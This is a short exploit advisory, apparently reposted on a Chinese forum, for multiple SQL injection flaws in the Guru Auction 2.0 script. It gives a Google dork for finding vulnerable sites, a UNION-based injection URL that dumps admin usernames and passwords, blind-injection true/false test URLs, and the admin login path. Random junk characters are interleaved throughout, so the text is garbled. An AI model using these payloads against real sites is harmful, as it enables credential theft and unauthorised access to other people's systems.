Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
5 I8 [+ ]6 [1 u! c/ S! s! A% D8 g( ^& e. m( u1 P9 @2 T
作者 : v3n0m, ]- c9 E6 C) l, u. H
应用 : Guru Auction 2.07 @' ]3 v S0 W8 n* S
Price : $49) p/ f. x- _; ~ }4 E5 V
Vendor : http://www.guruscript.com/5 d+ t2 u! b, Q
Google Dork : inurl:subcat.php?cate_id=
; } n. \7 n7 T( L9 ]* D+ a 1 t8 R$ F" @1 g5 B
SQLi p0c:
4 e9 I: M" L" N3 g, d~~~~~~~~~~
c9 I/ d) R$ \, ?6 Nhttp://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--& p) d; g% @4 @% O( H
8 u4 y7 P. U! O( j
& M) w6 w; m$ \0 Y. k盲注 p0c:
2 }9 @& x1 E- K7 t~~~~~~~~~~
^8 T+ e$ L8 R( V& T& z! t0 O9 `http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
/ I) d; Q: o- _* [8 Z3 E: @http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
7 K p" j1 S/ u
" j; p' z% h1 J% }8 l( j% K管理登录入口:5 X! ]+ I% d7 O+ a: A
~~~~~~~~~~) ^! ^$ C4 M; W. S% d
http://domain.tld/[path]/admin/) L$ p$ k+ e3 {; y/ R3 A
|